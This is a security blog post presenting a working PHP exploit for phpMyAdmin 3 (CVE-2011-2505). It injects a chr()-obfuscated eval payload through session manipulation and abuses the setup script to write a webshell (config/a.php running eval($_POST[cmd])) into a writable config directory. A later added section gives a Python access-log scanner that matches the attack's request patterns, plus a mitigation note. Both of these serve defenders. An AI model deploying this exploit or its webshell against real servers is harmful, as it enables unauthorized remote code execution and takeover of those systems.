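I have been a full-time stay-at-home dad lately, out of touch with the scene for many months, and the blog has not been updated either.

Last night I was up all night with the baby and saw Heige (黑哥) discussing the phpMyAdmin 3 vulnerability in the PHP security group. I had not read the vulnerable code before, though a while ago I did see wofeiwo's exp on Weibo. According to Heige there is a way to exploit it that is not "chicken ribs" (of marginal use), so during the night I dug out the code, studied it, and wrote this reheated-leftovers exp. I got to it late and many people had already studied the bug and written exploits, so mine is a rehash; treat it as research to pass the time.

First, kudos to wofeiwo's Python version of the exp, and kudos to wofeiwo and superhei for their spirit of digging in; role models to learn from. That said, the earlier exp has some restrictions in use:

First, session.auto_start = 1;
Second, in pma3's default code the libraries directory is already blocked from access with .htaccess.
And of course there is a third point, a gap nobody can get across: the config directory exists and is writable.

After reading Heige's comments in the group and looking at the code again, I found that the first two restrictions can both be ignored. So this vulnerability really can be not so marginal after all.

So I wrote this PHP version of the exp; the code is as follows: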

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
**/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
**/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
    echo "[+] token:$token\n";
    echo "[+] Session ID:$sessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
**/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.

/**
 * Try to create webshell
**/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
/**
 * Try to check if the webshell was created successfully
**/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Expoilt successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

function php_request($url,$data='',$cookie=''){
    global $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>
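
Seen from the defender's side, the request sequence in the script above leaves a recognizable trail in web-server access logs. The Python below is an added example, not part of the original post: it assumes combined-format access-log lines, and the stage names, sample log lines, IP addresses and placeholder values are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Assumed input: Apache/nginx "combined" access-log lines.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Stages mirror the request sequence of the exploit on this page.
STAGES = [
    # 1. Request parameters that try to write into the session array.
    ("session_overwrite", lambda m, u, s: "session_to_unset=" in u and "_session[" in u),
    # 2. The setup script is asked to save the (now tainted) configuration.
    ("setup_save", lambda m, u, s: m == "POST" and "/setup/config.php" in u),
    # 3. A PHP file under config/ was actually served.
    ("config_php_served", lambda m, u, s: s == "200" and re.search(r"/config/[^/?]+\.php", u)),
]

def scan(lines):
    """Return {client_ip: [stage names, in first-seen order]}."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, method, uri, status = m.groups()
        # Decode twice to catch %5B and %255B, then fold case.
        decoded = unquote(unquote(uri)).lower()
        for name, test in STAGES:
            if test(method.upper(), decoded, status) and name not in hits[ip]:
                hits[ip].append(name)
    return dict(hits)

def verdict(stages):
    if "session_overwrite" in stages and "setup_save" in stages:
        return "likely-exploited" if "config_php_served" in stages else "attempted"
    return "suspicious" if "session_overwrite" in stages else "review"

# Constructed sample log (documentation IPs, placeholder values).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jul/2011:03:12:01 +0000] "GET /pma/index.php HTTP/1.1" 200 8123',
    '198.51.100.7 - - [10/Jul/2011:03:12:02 +0000] "GET /pma/db_create.php?token=X&session_to_unset=x&_SESSION%5BConfigFile%5D%5BServers%5D%5BX%5D%5Bhost%5D=x HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jul/2011:03:12:03 +0000] "POST /pma/setup/config.php HTTP/1.1" 302 0',
    '198.51.100.7 - - [10/Jul/2011:03:12:04 +0000] "GET /pma/config/config.inc.php HTTP/1.1" 200 5',
    '203.0.113.9 - - [10/Jul/2011:09:00:00 +0000] "POST /pma/setup/config.php HTTP/1.1" 200 900',
    '192.0.2.44 - - [10/Jul/2011:09:05:00 +0000] "GET /pma/index.php?db=test HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    print({ip: verdict(s) for ip, s in scan(SAMPLE_LOG).items()})
```

The precondition the post names is also the mitigation: once setup is finished, a config directory that no longer exists or is not writable leaves the save step with nowhere to write.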